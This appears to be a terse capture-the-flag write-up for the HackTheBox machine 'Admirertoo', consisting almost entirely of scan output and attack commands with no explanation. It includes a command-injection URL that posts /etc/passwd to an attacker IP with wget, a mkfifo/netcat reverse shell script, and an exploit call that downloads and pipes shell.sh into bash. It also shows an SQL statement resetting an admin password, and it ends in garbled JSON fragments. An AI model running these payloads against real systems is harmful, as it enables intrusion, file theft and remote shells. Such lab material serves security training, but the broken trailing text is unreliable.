HackTheBox-Admirertoo

NMAP

PORT      STATE    SERVICE        VERSION
22/tcp    open     ssh            OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
|   2048 99:33:47:e6:5f:1f:2e:fd:45:a4:ee:6b:78:fb:c0:e4 (RSA)
|   256 4b:28:53:64:92:57:84:77:5f:8d:bf:af:d5:22:e1:10 (ECDSA)
|_  256 71:ee:8e:e5:98:ab:08:43:3b:86:29:57:23:26:e9:10 (ED25519)
80/tcp    open     http           Apache httpd 2.4.38 ((Debian))
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Admirer
4242/tcp  filtered vrml-multi-use
16010/tcp filtered unknown
16030/tcp filtered unknown
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

PORT 80 (HTTP)

wfuzz -c -w /opt/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -u 'http://admirer-gallery.htb' -H "Host: FUZZ.admirer-gallery.htb" --hl 268
/q?start=2000/10/21-00:00:00&end=2020/10/25-15:56:44&m=sum:http.stats.web.hits&o=&ylabel=&xrange=10:10&yrange=%5B33:system('wget%20--post-file%20/etc/passwd%20http://10.10.14.71/:2222/')%5D&wxh=1516x644&style=linespoint&baba=lala&grid=t&json
#!/bin/bash
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.71 2222 >/tmp/f
sudo python2 exploit.py -p 80 "http://10.10.11.137:4242/q?start=2000/10/21-00:00:00&end=2020/10/25-15:56:44&m=sum:http.stats.web.hits&o=&ylabel=&xrange=10:10&yrange=%5B33:system('curl%20http://10.10.14.71:4444/shell.sh%7Cbash')%5D&wxh=1516x644&style=linespoint&baba=lala&grid=t&json"
ssh -L 3333:127.0.0.1:8080 jennifer@10.10.11.137
UPDATE user SET password = '1bc29b36f623ba82aaf6724fd3b16718' WHERE user_id=1;
[{"Expires":1,"Discard":false,"Value":"10.10.16.24\n"}]
[{"Expires":1,"Discard":false,"Value":"}]
}] IP
}]| [IP]

Pentester | CTF Player

ARZ101